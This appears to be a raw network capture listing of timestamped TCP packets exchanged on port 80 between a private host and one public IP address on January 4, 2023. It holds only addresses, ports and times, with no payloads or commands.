Jan 4, 2023 16:47:45.425548077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425568104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425575972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425590038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425605059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425621986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425632954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425651073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425661087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425679922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425688982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425702095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425718069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425740004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425745964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425760031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425774097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425791025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425800085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425822973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425827026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425847054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425854921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425872087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425882101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425898075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425911903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425923109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425939083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425965071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425966978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425988913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425996065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426012993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426024914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426045895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426053047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426067114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426079035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426096916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426105976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426126003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426134109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426151037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426157951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426181078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426187992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426202059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426218033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426235914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426244974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426265955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426274061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426299095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426301956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426326036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426332951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426352024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426364899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426372051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426388979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426398039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426417112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426422119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426446915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426448107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426475048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426481962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426501989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426503897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426527023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426529884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426558971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426579952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426579952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426584005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426608086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426613092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426630020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426639080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426654100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426668882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426686049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426709890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426734924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426757097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426773071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426786900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426800013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426820993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426830053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426845074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426856995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426878929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426883936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426898956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426913977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426923990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426942110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426959038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426970959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.426986933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.426999092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427017927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427026987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427037954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427056074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427073002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427083015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427103996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427113056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427123070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427140951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427159071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427169085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427179098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427197933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427215099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427226067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427239895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427254915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427270889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427283049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427305937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427310944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427330017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427339077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427366018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427381039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427392960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427396059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427419901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427423000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427447081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427457094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427475929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427476883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427503109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427504063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427526951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427534103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427550077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427561998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427577972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427588940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427609921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427617073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427639961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427644014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427658081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427671909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427692890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427700043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427706957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427727938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427745104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427757978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427774906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427784920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427798986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427813053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427839041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427841902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427869081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427874088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427896976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427900076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427922964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427925110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427942991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427951097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427969933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.427978039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.427998066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428005934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428019047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428033113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428050041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428061962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428081036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428087950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428096056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428119898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428137064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428148031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428172112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428174019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428190947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428201914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428221941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428229094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428240061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428256989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428273916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428284883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428298950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428312063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428328991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428339958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428361893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428368092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428380013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428396940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428415060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428423882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428441048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428452015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428472042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428479910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428492069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428507090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428524971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428534031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428549051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428560972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428579092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428587914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428601027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428617001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428632021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428642988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428662062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428673983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428690910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428703070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428721905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428730965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428750038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428757906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428785086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428786993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428813934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428839922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428843021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428865910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428878069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428893089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428910971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428922892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428930998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428951025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428951025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.428977966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.428980112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429008961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429035902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429035902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429063082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429070950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429083109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429090977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429106951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429121017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429140091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429148912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429177046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429194927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429203033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429229021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429229975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429258108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429260969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429284096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429285049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429301023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429338932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429367065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429369926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429394007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429394007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429420948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429420948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429445028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429449081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429465055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429476976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429496050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429505110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429519892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429533005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429548979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429558992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429577112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429586887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429610014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429615974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429639101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429642916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429663897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429672003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429687977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429701090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429716110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429728985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429745913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429755926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429773092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429784060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429800987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429814100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429828882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429841995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429857969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429867983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429887056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429896116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429918051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429924965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429940939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429953098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429970026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.429981947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.429997921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430008888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430025101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430037022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430052042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430066109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430083036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430094004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430109978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430121899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430138111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430149078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430165052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430176020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430197954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430205107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430222988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430232048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430255890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430259943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430282116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430288076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430314064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430315018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430337906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430346012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.430358887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.430373907 CET	80	49696	66.235.200.147	192.168.2.4
